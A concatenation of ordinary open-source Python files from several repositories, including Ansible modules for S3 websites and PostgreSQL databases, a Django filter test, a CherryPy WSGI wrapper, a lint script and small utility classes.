output_format = {(True, False): "json",
(False, True): "markdown",
(False, False): "normal"}[(kwargs.get("json", False),
kwargs.get("markdown", False))]
if output_format == "markdown":
setup_logging(True)
paths = lint_paths(kwargs, repo_root)
return lint(repo_root, paths, output_format)
def lint(repo_root, paths, output_format):
error_count = defaultdict(int)
last = None
with open(os.path.join(repo_root, "lint.whitelist")) as f:
whitelist, ignored_files = parse_whitelist(f)
output_errors = {"json": output_errors_json,
"markdown": output_errors_markdown,
"normal": output_errors_text}[output_format]
def process_errors(errors):
"""
Filters and prints the errors, and updates the ``error_count`` object.
:param errors: a list of error tuples (error type, message, path, line number)
:returns: ``None`` if there were no errors, or
a tuple of the error type and the path otherwise
"""
errors = filter_whitelist_errors(whitelist, errors)
if not errors:
return None
output_errors(errors)
for error_type, error, path, line in errors:
error_count[error_type] += 1
return (errors[-1][0], path)
for path in paths[:]:
abs_path = os.path.join(repo_root, path)
if not os.path.exists(abs_path):
paths.remove(path)
continue
if any(fnmatch.fnmatch(path, file_match) for file_match in ignored_files):
paths.remove(path)
continue
errors = check_path(repo_root, path)
last = process_errors(errors) or last
if not os.path.isdir(abs_path):
with open(abs_path, 'rb') as f:
errors = check_file_contents(repo_root, path, f)
last = process_errors(errors) or last
errors = check_all_paths(repo_root, paths)
last = process_errors(errors) or last
if output_format in ("normal", "markdown"):
output_error_count(error_count)
if error_count:
for line in (ERROR_MSG % (last[0], last[1], last[0], last[1])).split("\n"):
logger.info(line)
return sum(itervalues(error_count))
path_lints = [check_path_length, check_worker_collision, check_ahem_copy]
all_paths_lints = [check_css_globally_unique]
file_lints = [check_regexp_line, check_parsed, check_python_ast, check_script_metadata]
# Don't break users of the lint that don't have git installed.
try:
subprocess.check_output(["git", "--version"])
all_paths_lints += [check_git_ignore]
except subprocess.CalledProcessError:
print('No git present; skipping .gitignore lint.')
if __name__ == "__main__":
args = create_parser().parse_args()
error_count = main(**vars(args))
if error_count > 0:
sys.exit(1)
|
phalt/django | refs/heads/master | tests/template_tests/filter_tests/test_pluralize.py | 430 | from decimal import Decimal
from django.template.defaultfilters import pluralize
from django.test import SimpleTestCase
class FunctionTests(SimpleTestCase):
def test_integers(self):
self.assertEqual(pluralize(1), '')
self.assertEqual(pluralize(0), 's')
self.assertEqual(pluralize(2), 's')
def test_floats(self):
self.assertEqual(pluralize(0.5), 's')
self.assertEqual(pluralize(1.5), 's')
def test_decimals(self):
self.assertEqual(pluralize(Decimal(1)), '')
self.assertEqual(pluralize(Decimal(0)), 's')
self.assertEqual(pluralize(Decimal(2)), 's')
def test_lists(self):
self.assertEqual(pluralize([1]), '')
self.assertEqual(pluralize([]), 's')
self.assertEqual(pluralize([1, 2, 3]), 's')
def test_suffixes(self):
self.assertEqual(pluralize(1, 'es'), '')
self.assertEqual(pluralize(0, 'es'), 'es')
self.assertEqual(pluralize(2, 'es'), 'es')
self.assertEqual(pluralize(1, 'y,ies'), 'y')
self.assertEqual(pluralize(0, 'y,ies'), 'ies')
self.assertEqual(pluralize(2, 'y,ies'), 'ies')
self.assertEqual(pluralize(0, 'y,ies,error'), '')
|
pombreda/django-hotclub | refs/heads/master | apps/local_apps/bbauth/urls.py | 5 | from django.conf.urls.defaults import *
urlpatterns = patterns('',
url(r'^login/$', 'bbauth.views.login'),
url(r'^success/$', 'bbauth.views.success'),
url(r'^logout/$', 'bbauth.views.logout'),
) |
lmazuel/ansible | refs/heads/devel | lib/ansible/modules/cloud/amazon/s3_website.py | 50 | #!/usr/bin/python
#
# This is a free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This Ansible library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this library. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: s3_website
short_description: Configure an s3 bucket as a website
description:
- Configure an s3 bucket as a website
version_added: "2.2"
author: Rob White (@wimnat)
options:
name:
description:
- "Name of the s3 bucket"
required: true
default: null
error_key:
description:
- "The object key name to use when a 4XX class error occurs. To remove an error key, set to None."
required: false
default: null
redirect_all_requests:
description:
- "Describes the redirect behavior for every request to this s3 bucket website endpoint"
required: false
default: null
region:
description:
- >
AWS region to create the bucket in. If not set then the value of the AWS_REGION and EC2_REGION environment variables are checked,
followed by the aws_region and ec2_region settings in the Boto config file. If none of those are set the region defaults to the
S3 Location: US Standard.
required: false
default: null
state:
description:
- "Add or remove s3 website configuration"
required: false
default: present
choices: [ 'present', 'absent' ]
suffix:
description:
- >
Suffix that is appended to a request that is for a directory on the website endpoint (e.g. if the suffix is index.html and you make a request to
samplebucket/images/ the data that is returned will be for the object with the key name images/index.html). The suffix must not include a slash
character.
required: false
default: index.html
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
# Configure an s3 bucket to redirect all requests to example.com
- s3_website:
name: mybucket.com
redirect_all_requests: example.com
state: present
# Remove website configuration from an s3 bucket
- s3_website:
name: mybucket.com
state: absent
# Configure an s3 bucket as a website with index and error pages
- s3_website:
name: mybucket.com
suffix: home.htm
error_key: errors/404.htm
state: present
'''
RETURN = '''
index_document:
description: index document
type: complex
returned: always
contains:
suffix:
description: suffix that is appended to a request that is for a directory on the website endpoint
returned: success
type: string
sample: index.html
error_document:
description: error document
type: complex
returned: always
contains:
key:
description: object key name to use when a 4XX class error occurs
returned: when error_document parameter set
type: string
sample: error.html
redirect_all_requests_to:
description: where to redirect requests
type: complex
returned: always
contains:
host_name:
description: name of the host where requests will be redirected.
returned: when redirect all requests parameter set
type: string
sample: ansible.com
routing_rules:
description: routing rules
type: complex
returned: always
contains:
routing_rule:
host_name:
description: name of the host where requests will be redirected.
returned: when host name set as part of redirect rule
type: string
sample: ansible.com
condition:
key_prefix_equals:
description: object key name prefix when the redirect is applied. For example, to redirect requests for ExamplePage.html, the key prefix will be
ExamplePage.html
returned: when routing rule present
type: string
sample: docs/
redirect:
replace_key_prefix_with:
description: object key prefix to use in the redirect request
returned: when routing rule present
type: string
sample: documents/
'''
import time
try:
from botocore.exceptions import ClientError, ParamValidationError, NoCredentialsError
import boto3
HAS_BOTO3 = True
except ImportError:
HAS_BOTO3 = False
def _create_redirect_dict(url):
redirect_dict = {}
url_split = url.split(':')
# Did we split anything?
if len(url_split) == 2:
redirect_dict[u'Protocol'] = url_split[0]
redirect_dict[u'HostName'] = url_split[1].replace('//', '')
elif len(url_split) == 1:
redirect_dict[u'HostName'] = url_split[0]
else:
raise ValueError('Redirect URL appears invalid')
return redirect_dict
def _create_website_configuration(suffix, error_key, redirect_all_requests):
website_configuration = {}
if error_key is not None:
website_configuration['ErrorDocument'] = { 'Key': error_key }
if suffix is not None:
website_configuration['IndexDocument'] = { 'Suffix': suffix }
if redirect_all_requests is not None:
website_configuration['RedirectAllRequestsTo'] = _create_redirect_dict(redirect_all_requests)
return website_configuration
def enable_or_update_bucket_as_website(client_connection, resource_connection, module):
bucket_name = module.params.get("name")
redirect_all_requests = module.params.get("redirect_all_requests")
# If redirect_all_requests is set then don't use the default suffix that has been set
if redirect_all_requests is not None:
suffix = None
else:
suffix = module.params.get("suffix")
error_key = module.params.get("error_key")
changed = False
try:
bucket_website = resource_connection.BucketWebsite(bucket_name)
except ClientError as e:
module.fail_json(msg=e.message, **camel_dict_to_snake_dict(e.response))
try:
website_config = client_connection.get_bucket_website(Bucket=bucket_name)
except ClientError as e:
if e.response['Error']['Code'] == 'NoSuchWebsiteConfiguration':
website_config = None
else:
module.fail_json(msg=e.message, **camel_dict_to_snake_dict(e.response))
if website_config is None:
try:
bucket_website.put(WebsiteConfiguration=_create_website_configuration(suffix, error_key, redirect_all_requests))
changed = True
except (ClientError, ParamValidationError) as e:
module.fail_json(msg=e.message, **camel_dict_to_snake_dict(e.response))
except ValueError as e:
module.fail_json(msg=str(e))
else:
try:
if (suffix is not None and website_config['IndexDocument']['Suffix'] != suffix) or \
(error_key is not None and website_config['ErrorDocument']['Key'] != error_key) or \
(redirect_all_requests is not None and website_config['RedirectAllRequestsTo'] != _create_redirect_dict(redirect_all_requests)):
try:
bucket_website.put(WebsiteConfiguration=_create_website_configuration(suffix, error_key, redirect_all_requests))
changed = True
except (ClientError, ParamValidationError) as e:
module.fail_json(msg=e.message, **camel_dict_to_snake_dict(e.response))
except KeyError as e:
try:
bucket_website.put(WebsiteConfiguration=_create_website_configuration(suffix, error_key, redirect_all_requests))
changed = True
except (ClientError, ParamValidationError) as e:
module.fail_json(msg=e.message, **camel_dict_to_snake_dict(e.response))
except ValueError as e:
module.fail_json(msg=str(e))
# Wait 5 secs before getting the website_config again to give it time to update
time.sleep(5)
website_config = client_connection.get_bucket_website(Bucket=bucket_name)
module.exit_json(changed=changed, **camel_dict_to_snake_dict(website_config))
def disable_bucket_as_website(client_connection, module):
changed = False
bucket_name = module.params.get("name")
try:
client_connection.get_bucket_website(Bucket=bucket_name)
except ClientError as e:
if e.response['Error']['Code'] == 'NoSuchWebsiteConfiguration':
module.exit_json(changed=changed)
else:
module.fail_json(msg=e.message, **camel_dict_to_snake_dict(e.response))
try:
client_connection.delete_bucket_website(Bucket=bucket_name)
changed = True
except ClientError as e:
module.fail_json(msg=e.message, **camel_dict_to_snake_dict(e.response))
module.exit_json(changed=changed)
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
name=dict(type='str', required=True),
state=dict(type='str', required=True, choices=['present', 'absent']),
suffix=dict(type='str', required=False, default='index.html'),
error_key=dict(type='str', required=False),
redirect_all_requests=dict(type='str', required=False)
)
)
module = AnsibleModule(
argument_spec=argument_spec,
mutually_exclusive = [
['redirect_all_requests', 'suffix'],
['redirect_all_requests', 'error_key']
])
if not HAS_BOTO3:
module.fail_json(msg='boto3 required for this module')
region, ec2_url, aws_connect_params = get_aws_connection_info(module, boto3=True)
if region:
client_connection = boto3_conn(module, conn_type='client', resource='s3', region=region, endpoint=ec2_url, **aws_connect_params)
resource_connection = boto3_conn(module, conn_type='resource', resource='s3', region=region, endpoint=ec2_url, **aws_connect_params)
else:
module.fail_json(msg="region must be specified")
state = module.params.get("state")
if state == 'present':
enable_or_update_bucket_as_website(client_connection, resource_connection, module)
elif state == 'absent':
disable_bucket_as_website(client_connection, module)
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
if __name__ == '__main__':
main()
|
arjclark/cylc | refs/heads/master | lib/cherrypy/_cpwsgi_server.py | 68 | """WSGI server interface (see PEP 333). This adds some CP-specific bits to
the framework-agnostic wsgiserver package.
"""
import sys
import cherrypy
from cherrypy import wsgiserver
class CPWSGIServer(wsgiserver.CherryPyWSGIServer):
"""Wrapper for wsgiserver.CherryPyWSGIServer.
wsgiserver has been designed to not reference CherryPy in any way,
so that it can be used in other frameworks and applications. Therefore,
we wrap it here, so we can set our own mount points from cherrypy.tree
and apply some attributes from config -> cherrypy.server -> wsgiserver.
"""
def __init__(self, server_adapter=cherrypy.server):
self.server_adapter = server_adapter
self.max_request_header_size = (
self.server_adapter.max_request_header_size or 0
)
self.max_request_body_size = (
self.server_adapter.max_request_body_size or 0
)
server_name = (self.server_adapter.socket_host or
self.server_adapter.socket_file or
None)
self.wsgi_version = self.server_adapter.wsgi_version
s = wsgiserver.CherryPyWSGIServer
s.__init__(self, server_adapter.bind_addr, cherrypy.tree,
self.server_adapter.thread_pool,
server_name,
max=self.server_adapter.thread_pool_max,
request_queue_size=self.server_adapter.socket_queue_size,
timeout=self.server_adapter.socket_timeout,
shutdown_timeout=self.server_adapter.shutdown_timeout,
accepted_queue_size=self.server_adapter.accepted_queue_size,
accepted_queue_timeout=self.server_adapter.accepted_queue_timeout,
)
self.protocol = self.server_adapter.protocol_version
self.nodelay = self.server_adapter.nodelay
if sys.version_info >= (3, 0):
ssl_module = self.server_adapter.ssl_module or 'builtin'
else:
ssl_module = self.server_adapter.ssl_module or 'pyopenssl'
if self.server_adapter.ssl_context:
adapter_class = wsgiserver.get_ssl_adapter_class(ssl_module)
self.ssl_adapter = adapter_class(
self.server_adapter.ssl_certificate,
self.server_adapter.ssl_private_key,
self.server_adapter.ssl_certificate_chain)
self.ssl_adapter.context = self.server_adapter.ssl_context
elif self.server_adapter.ssl_certificate:
adapter_class = wsgiserver.get_ssl_adapter_class(ssl_module)
self.ssl_adapter = adapter_class(
self.server_adapter.ssl_certificate,
self.server_adapter.ssl_private_key,
self.server_adapter.ssl_certificate_chain)
self.stats['Enabled'] = getattr(
self.server_adapter, 'statistics', False)
def error_log(self, msg="", level=20, traceback=False):
cherrypy.engine.log(msg, level, traceback)
|
troycomi/microMS | refs/heads/master | CoordinateMappers/__init__.py | 1 | '''
Package with all coordinate system mappers and connected instruments
brukerMapper.py: An abstract base class implementing coordinateMapper specific
for bruker type instruments using their fractional distance.
connectedInstrument.py: An abstract base class specifying functions required for
interacting with a connected instrument
coordinateMapper.py: An abstract base class with some standard methods for mapping
pixel positions to physical locations in an instrument.
flexImagingSolarix.py: An extension of solarixMapper which generates files suitable
for acquisition with flexImaging.
oMaldiMapper.py: Implementation of coordinate mapper for acquisition with the
AB Sciex oMaldi server. Contains methods for slop correction
solarixMapper.py: Implementation of brukerMapper for the solarix FT-ICR
that generates xeo and xls files for autoacquisition
supportedCoordSystems.py: A collection of coordinatemappers. Only mappers included here
will be accessible to the GUI
ultraflexMapper.py: An implementation of brukerMapper for the ultraflextreme tof/tof
that generates xeo files for autoexecute
zaber3axis.py Concrete implementation of a connected instrument for an XYZ stage
for liquid microjunction extraction.
zaberInterface.py: An abstract base class with methods for interacting with zaber
linear actuators.
zaberMapper.py: An implementation of coordinateMapper with a connected zaber3axis
used for the liquid microjunction extraction.
''' |
n0trax/ansible | refs/heads/devel | lib/ansible/modules/database/postgresql/postgresql_db.py | 9 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: postgresql_db
short_description: Add or remove PostgreSQL databases from a remote host.
description:
- Add or remove PostgreSQL databases from a remote host.
version_added: "0.6"
options:
name:
description:
- name of the database to add or remove
required: true
default: null
aliases: [ db ]
owner:
description:
- Name of the role to set as owner of the database
required: false
default: null
template:
description:
- Template used to create the database
required: false
default: null
encoding:
description:
- Encoding of the database
required: false
default: null
lc_collate:
description:
- Collation order (LC_COLLATE) to use in the database. Must match collation order of template database unless C(template0) is used as template.
required: false
default: null
lc_ctype:
description:
- Character classification (LC_CTYPE) to use in the database (e.g. lower, upper, ...) Must match LC_CTYPE of template database unless C(template0)
is used as template.
required: false
default: null
state:
description: |
The database state. present implies that the database should be created if necessary.
absent implies that the database should be removed if present.
dump requires a target definition to which the database will be backed up.
(Added in 2.4) restore also requires a target definition from which the database will be restored.
(Added in 2.4) The format of the backup will be detected based on the target name.
Supported compression formats for dump and restore are: .bz2, .gz, and .xz
Supported formats for dump and restore are: .sql and .tar
required: false
default: present
choices: [ "present", "absent", "dump", "restore" ]
target:
version_added: "2.4"
description:
- File to back up or restore from. Used when state is "dump" or "restore"
target_opts:
version_added: "2.4"
description:
- Further arguments for pg_dump or pg_restore. Used when state is "dump" or "restore"
author: "Ansible Core Team"
extends_documentation_fragment:
- postgres
'''
EXAMPLES = '''
# Create a new database with name "acme"
- postgresql_db:
name: acme
# Create a new database with name "acme" and specific encoding and locale
# settings. If a template different from "template0" is specified, encoding
# and locale settings must match those of the template.
- postgresql_db:
name: acme
encoding: UTF-8
lc_collate: de_DE.UTF-8
lc_ctype: de_DE.UTF-8
template: template0
# Dump an existing database to a file
- postgresql_db:
name: acme
state: dump
target: /tmp/acme.sql
# Dump an existing database to a file (with compression)
- postgresql_db:
name: acme
state: dump
target: /tmp/acme.sql.gz
# Dump a single schema for an existing database
- postgresql_db:
name: acme
state: dump
target: /tmp/acme.sql
target_opts: "-n public"
'''
import traceback
HAS_PSYCOPG2 = False
try:
import psycopg2
import psycopg2.extras
import pipes
import subprocess
import os
except ImportError:
pass
else:
HAS_PSYCOPG2 = True
import ansible.module_utils.postgres as pgutils
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.database import SQLParseError, pg_quote_identifier
from ansible.module_utils.six import iteritems
from ansible.module_utils._text import to_native
class NotSupportedError(Exception):
pass
# ===========================================
# PostgreSQL module specific support methods.
#
def set_owner(cursor, db, owner):
query = "ALTER DATABASE %s OWNER TO %s" % (
pg_quote_identifier(db, 'database'),
pg_quote_identifier(owner, 'role'))
cursor.execute(query)
return True
def get_encoding_id(cursor, encoding):
query = "SELECT pg_char_to_encoding(%(encoding)s) AS encoding_id;"
cursor.execute(query, {'encoding': encoding})
return cursor.fetchone()['encoding_id']
def get_db_info(cursor, db):
query = """
SELECT rolname AS owner,
pg_encoding_to_char(encoding) AS encoding, encoding AS encoding_id,
datcollate AS lc_collate, datctype AS lc_ctype
FROM pg_database JOIN pg_roles ON pg_roles.oid = pg_database.datdba
WHERE datname = %(db)s
"""
cursor.execute(query, {'db': db})
return cursor.fetchone()
def db_exists(cursor, db):
query = "SELECT * FROM pg_database WHERE datname=%(db)s"
cursor.execute(query, {'db': db})
return cursor.rowcount == 1
def db_delete(cursor, db):
if db_exists(cursor, db):
query = "DROP DATABASE %s" % pg_quote_identifier(db, 'database')
cursor.execute(query)
return True
else:
return False
def db_create(cursor, db, owner, template, encoding, lc_collate, lc_ctype):
params = dict(enc=encoding, collate=lc_collate, ctype=lc_ctype)
if not db_exists(cursor, db):
query_fragments = ['CREATE DATABASE %s' % pg_quote_identifier(db, 'database')]
if owner:
query_fragments.append('OWNER %s' % pg_quote_identifier(owner, 'role'))
if template:
query_fragments.append('TEMPLATE %s' % pg_quote_identifier(template, 'database'))
if encoding:
query_fragments.append('ENCODING %(enc)s')
if lc_collate:
query_fragments.append('LC_COLLATE %(collate)s')
if lc_ctype:
query_fragments.append('LC_CTYPE %(ctype)s')
query = ' '.join(query_fragments)
cursor.execute(query, params)
return True
else:
db_info = get_db_info(cursor, db)
if (encoding and
get_encoding_id(cursor, encoding) != db_info['encoding_id']):
raise NotSupportedError(
'Changing database encoding is not supported. '
'Current encoding: %s' % db_info['encoding']
)
elif lc_collate and lc_collate != db_info['lc_collate']:
raise NotSupportedError(
'Changing LC_COLLATE is not supported. '
'Current LC_COLLATE: %s' % db_info['lc_collate']
)
elif lc_ctype and lc_ctype != db_info['lc_ctype']:
raise NotSupportedError(
'Changing LC_CTYPE is not supported.'
'Current LC_CTYPE: %s' % db_info['lc_ctype']
)
elif owner and owner != db_info['owner']:
return set_owner(cursor, db, owner)
else:
return False
def db_matches(cursor, db, owner, template, encoding, lc_collate, lc_ctype):
if not db_exists(cursor, db):
return False
else:
db_info = get_db_info(cursor, db)
if (encoding and
get_encoding_id(cursor, encoding) != db_info['encoding_id']):
return False
elif lc_collate and lc_collate != db_info['lc_collate']:
return False
elif lc_ctype and lc_ctype != db_info['lc_ctype']:
return False
elif owner and owner != db_info['owner']:
return False
else:
return True
def db_dump(module, target, target_opts="",
db=None,
user=None,
password=None,
host=None,
port=None,
**kw):
flags = login_flags(db, host, port, user, db_prefix=False)
cmd = module.get_bin_path('pg_dump', True)
comp_prog_path = None
if os.path.splitext(target)[-1] == '.tar':
flags.append(' --format=t')
if os.path.splitext(target)[-1] == '.gz':
if module.get_bin_path('pigz'):
comp_prog_path = module.get_bin_path('pigz', True)
else:
comp_prog_path = module.get_bin_path('gzip', True)
elif os.path.splitext(target)[-1] == '.bz2':
comp_prog_path = module.get_bin_path('bzip2', True)
elif os.path.splitext(target)[-1] == '.xz':
comp_prog_path = module.get_bin_path('xz', True)
cmd += "".join(flags)
if target_opts:
cmd += " {0} ".format(target_opts)
if comp_prog_path:
cmd = '{0}|{1} > {2}'.format(cmd, comp_prog_path, pipes.quote(target))
else:
cmd = '{0} > {1}'.format(cmd, pipes.quote(target))
return do_with_password(module, cmd, password)
def db_restore(module, target, target_opts="",
db=None,
user=None,
password=None,
host=None,
port=None,
**kw):
flags = login_flags(db, host, port, user)
comp_prog_path = None
cmd = module.get_bin_path('psql', True)
if os.path.splitext(target)[-1] == '.sql':
flags.append(' --file={0}'.format(target))
elif os.path.splitext(target)[-1] == '.tar':
flags.append(' --format=Tar')
cmd = module.get_bin_path('pg_restore', True)
elif os.path.splitext(target)[-1] == '.gz':
comp_prog_path = module.get_bin_path('zcat', True)
elif os.path.splitext(target)[-1] == '.bz2':
comp_prog_path = module.get_bin_path('bzcat', True)
elif os.path.splitext(target)[-1] == '.xz':
comp_prog_path = module.get_bin_path('xzcat', True)
cmd += "".join(flags)
if target_opts:
cmd += " {0} ".format(target_opts)
if comp_prog_path:
env = os.environ.copy()
if password:
env = {"PGPASSWORD": password}
p1 = subprocess.Popen([comp_prog_path, target], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p2 = subprocess.Popen(cmd, stdin=p1.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, env=env)
(stdout2, stderr2) = p2.communicate()
p1.stdout.close()
p1.wait()
if p1.returncode != 0:
stderr1 = p1.stderr.read()
return p1.returncode, '', stderr1, 'cmd: ****'
else:
return p2.returncode, '', stderr2, 'cmd: ****'
else:
cmd = '{0} < {1}'.format(cmd, pipes.quote(target))
return do_with_password(module, cmd, password)
def login_flags(db, host, port, user, db_prefix=True):
"""
returns a list of connection argument strings each prefixed
with a space and quoted where necessary to later be combined
in a single shell string with `"".join(rv)`
db_prefix determines if "--dbname" is prefixed to the db argument,
since the argument was introduced in 9.3.
"""
flags = []
if db:
if db_prefix:
flags.append(' --dbname={0}'.format(pipes.quote(db)))
else:
flags.append(' {0}'.format(pipes.quote(db)))
if host:
flags.append(' --host={0}'.format(host))
if port:
flags.append(' --port={0}'.format(port))
if user:
flags.append(' --username={0}'.format(user))
return flags
def do_with_password(module, cmd, password):
env = {}
if password:
env = {"PGPASSWORD": password}
rc, stderr, stdout = module.run_command(cmd, use_unsafe_shell=True, environ_update=env)
return rc, stderr, stdout, cmd
# ===========================================
# Module execution.
#
def main():
argument_spec = pgutils.postgres_common_argument_spec()
argument_spec.update(dict(
db=dict(required=True, aliases=['name']),
owner=dict(default=""),
template=dict(default=""),
encoding=dict(default=""),
lc_collate=dict(default=""),
lc_ctype=dict(default=""),
state=dict(default="present", choices=["absent", "present", "dump", "restore"]),
target=dict(default=""),
target_opts=dict(default=""),
))
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode = True
)
if not HAS_PSYCOPG2:
module.fail_json(msg="the python psycopg2 module is required")
db = module.params["db"]
owner = module.params["owner"]
template = module.params["template"]
encoding = module.params["encoding"]
lc_collate = module.params["lc_collate"]
lc_ctype = module.params["lc_ctype"]
target = module.params["target"]
target_opts = module.params["target_opts"]
state = module.params["state"]
changed = False
# To use defaults values, keyword arguments must be absent, so
# check which values are empty and don't include in the **kw
# dictionary
params_map = {
"login_host":"host",
"login_user":"user",
"login_password":"password",
"port":"port",
"ssl_mode":"sslmode",
"ssl_rootcert":"sslrootcert"
}
kw = dict( (params_map[k], v) for (k, v) in iteritems(module.params)
if k in params_map and v != '' and v is not None)
# If a login_unix_socket is specified, incorporate it here.
is_localhost = "host" not in kw or kw["host"] == "" or kw["host"] == "localhost"
if is_localhost and module.params["login_unix_socket"] != "":
kw["host"] = module.params["login_unix_socket"]
if target == "":
target = "{0}/{1}.sql".format(os.getcwd(), db)
target = os.path.expanduser(target)
else:
target = os.path.expanduser(target)
try:
pgutils.ensure_libs(sslrootcert=module.params.get('ssl_rootcert'))
db_connection = psycopg2.connect(database="postgres", **kw)
# Enable autocommit so we can create databases
if psycopg2.__version__ >= '2.4.2':
db_connection.autocommit = True
else:
db_connection.set_isolation_level(psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT)
cursor = db_connection.cursor(cursor_factory=psycopg2.extras.DictCursor)
except pgutils.LibraryError as e:
module.fail_json(msg="unable to connect to database: {0}".format(to_native(e)), exception=traceback.format_exc())
except TypeError as e:
if 'sslrootcert' in e.args[0]:
module.fail_json(msg='Postgresql server must be at least version 8.4 to support sslrootcert. Exception: {0}'.format(to_native(e)),
exception=traceback.format_exc())
module.fail_json(msg="unable to connect to database: %s" % to_native(e), exception=traceback.format_exc())
except Exception as e:
module.fail_json(msg="unable to connect to database: %s" % to_native(e), exception=traceback.format_exc())
try:
if module.check_mode:
if state == "absent":
changed = db_exists(cursor, db)
elif state == "present":
changed = not db_matches(cursor, db, owner, template, encoding, lc_collate, lc_ctype)
module.exit_json(changed=changed, db=db)
if state == "absent":
try:
changed = db_delete(cursor, db)
except SQLParseError as e:
module.fail_json(msg=to_native(e), exception=traceback.format_exc())
elif state == "present":
try:
changed = db_create(cursor, db, owner, template, encoding, lc_collate, lc_ctype)
except SQLParseError as e:
module.fail_json(msg=to_native(e), exception=traceback.format_exc())
elif state in ("dump", "restore"):
method = state == "dump" and db_dump or db_restore
try:
rc, stdout, stderr, cmd = method(module, target, target_opts, db, **kw)
if rc != 0:
module.fail_json(msg=stderr, stdout=stdout, rc=rc, cmd=cmd)
else:
module.exit_json(changed=True, msg=stdout, stderr=stderr, rc=rc, cmd=cmd)
except SQLParseError as e:
module.fail_json(msg=to_native(e), exception=traceback.format_exc())
except NotSupportedError as e:
module.fail_json(msg=to_native(e), exception=traceback.format_exc())
except SystemExit:
# Avoid catching this on Python 2.4
raise
except Exception as e:
module.fail_json(msg="Database query failed: %s" % to_native(e), exception=traceback.format_exc())
module.exit_json(changed=changed, db=db)
if __name__ == '__main__':
main()
|
boyuegame/kbengine | refs/heads/master | kbe/res/scripts/common/Lib/site-packages/pip/_vendor/html5lib/trie/py.py | 1323 | from __future__ import absolute_import, division, unicode_literals
from pip._vendor.six import text_type
from bisect import bisect_left
from ._base import Trie as ABCTrie
class Trie(ABCTrie):
def __init__(self, data):
if not all(isinstance(x, text_type) for x in data.keys()):
raise TypeError("All keys must be strings")
self._data = data
self._keys = sorted(data.keys())
self._cachestr = ""
self._cachepoints = (0, len(data))
def __contains__(self, key):
return key in self._data
def __len__(self):
return len(self._data)
def __iter__(self):
return iter(self._data)
def __getitem__(self, key):
return self._data[key]
def keys(self, prefix=None):
if prefix is None or prefix == "" or not self._keys:
return set(self._keys)
if prefix.startswith(self._cachestr):
lo, hi = self._cachepoints
start = i = bisect_left(self._keys, prefix, lo, hi)
else:
start = i = bisect_left(self._keys, prefix)
keys = set()
if start == len(self._keys):
return keys
while self._keys[i].startswith(prefix):
keys.add(self._keys[i])
i += 1
self._cachestr = prefix
self._cachepoints = (start, i)
return keys
def has_keys_with_prefix(self, prefix):
if prefix in self._data:
return True
if prefix.startswith(self._cachestr):
lo, hi = self._cachepoints
i = bisect_left(self._keys, prefix, lo, hi)
else:
i = bisect_left(self._keys, prefix)
if i == len(self._keys):
return False
return self._keys[i].startswith(prefix)
|
ChenJunor/hue | refs/heads/master | desktop/core/ext-py/guppy-0.1.10/guppy/etc/textView.py | 37 | #._cv_part guppy.etc.textView
# Copied from idlelib/textView
# - I copied it rather than imported since I didn't want
# to have a dependency on idlelib,
# and I can change what I may want.
# For example, I removed the transient and wait window things
# so a help window behaves more like a 'normal' window
"""Simple text browser
"""
from Tkinter import *
import tkMessageBox
class TextViewer(Toplevel):
"""
simple text viewer dialog for idle
"""
def __init__(self, parent, title, fileName=None, data=None):
"""If data exists, load it into viewer, otherwise try to load file.
fileName - string, should be an absoulute filename
"""
Toplevel.__init__(self, parent)
self.configure(borderwidth=5)
self.geometry("=%dx%d+%d+%d" % (625, 500,
parent.winfo_rootx() + 10,
parent.winfo_rooty() + 10))
#elguavas - config placeholders til config stuff completed
self.bg = '#ffffff'
self.fg = '#000000'
self.CreateWidgets()
self.title(title)
#self.transient(parent)
#self.grab_set()
self.protocol("WM_DELETE_WINDOW", self.Ok)
self.parent = parent
self.textView.focus_set()
#key bindings for this dialog
self.bind('<Return>',self.Ok) #dismiss dialog
self.bind('<Escape>',self.Ok) #dismiss dialog
if data is not None:
self.textView.insert(0.0, data)
else:
self.LoadTextFile(fileName)
self.textView.config(state=DISABLED)
#self.wait_window()
def LoadTextFile(self, fileName):
textFile = None
try:
textFile = open(fileName, 'r')
except IOError:
tkMessageBox.showerror(title='File Load Error',
message='Unable to load file '+`fileName`+' .')
else:
self.textView.insert(0.0,textFile.read())
def CreateWidgets(self):
frameText = Frame(self, relief=SUNKEN, height=700)
frameButtons = Frame(self)
self.buttonOk = Button(frameButtons, text='Close',
command=self.Ok, takefocus=FALSE)
self.scrollbarView = Scrollbar(frameText, orient=VERTICAL,
takefocus=FALSE, highlightthickness=0)
self.textView = Text(frameText, wrap=WORD, highlightthickness=0,
fg=self.fg, bg=self.bg)
self.scrollbarView.config(command=self.textView.yview)
self.textView.config(yscrollcommand=self.scrollbarView.set)
self.buttonOk.pack()
self.scrollbarView.pack(side=RIGHT,fill=Y)
self.textView.pack(side=LEFT,expand=TRUE,fill=BOTH)
frameButtons.pack(side=BOTTOM,fill=X)
frameText.pack(side=TOP,expand=TRUE,fill=BOTH)
def Ok(self, event=None):
self.destroy()
if __name__ == '__main__':
#test the dialog
root=Tk()
Button(root,text='View',
command=lambda:TextViewer(root,'Text','./textView.py')).pack()
root.mainloop()
|
